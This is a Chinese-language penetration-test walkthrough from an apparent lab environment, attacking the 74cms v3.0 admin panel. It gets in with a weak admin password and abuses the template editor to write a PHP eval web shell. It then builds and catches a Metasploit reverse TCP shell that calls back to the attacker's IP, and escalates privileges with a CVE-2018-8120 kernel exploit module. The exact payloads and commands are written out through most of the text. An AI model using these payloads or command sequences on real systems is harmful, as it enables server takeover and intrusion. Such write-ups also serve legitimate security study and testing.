骑士cms v3.0 后台任意文件写入 getshell 并提权

骑士cms v3.0 后台任意文件写入 getshell 并提权

测试环境

靶机：http://172.168.83.122/admin/

攻击机：172.168.30.45

1. 信息收集---扫描web目录

   发现后台管理页面

2. 信息收集---端口扫描

   

3. 扫端口好慢先试试弱口令？

   试了几次还真就进来了，本来还想试试注入。。。。

   

4. 搜索一番后发现模板模块可以任意写入文件

   构造payload如下

   提交地址:
   http://172.168.83.122/admin/upload/admin/admin_templates.php?act=do_edit
   

   post提交数据：
   tpl_name=shell2.php&tpl_content=<?php @eval($_POST[pwd]);phpinfo();?>
   

   

5. 写入成功，蚁剑给我连

   

6. 成功getshell

   

7. 但是权限较低，尝试提权，创建反弹shell并从蚁剑上传

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.168.30.45 LPORT=4433 -f exe -o 4433.exe
   

   

8. kali设置监听并运行反弹shell 成功反弹

   msfconsle
   msf5 > use exploit/multi/handler
   msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
   msf5 exploit(multi/handler) > set LHOST 172.168.30.45
   msf5 exploit(multi/handler) > set LPORT 4433
   msf5 exploit(multi/handler) > run
   

   

9. 搜索已安装补丁

   run post/windows/gather/enum_patches
   

   

10. 看似打了很多补丁，但新的漏洞没有修补

    这里用一个常用的内核提权漏洞cve-2018-8120

    

    search cve-2018-8120
    use  exploit/windows/local/ms18_8120_win32k_privesc
    set session 1
    run
    

11. 成功提权

---

[1] https://blog.csdn.net/qq_42879069/article/details/110859869

[2] https://blog.csdn.net/qq_36374896/article/details/84840160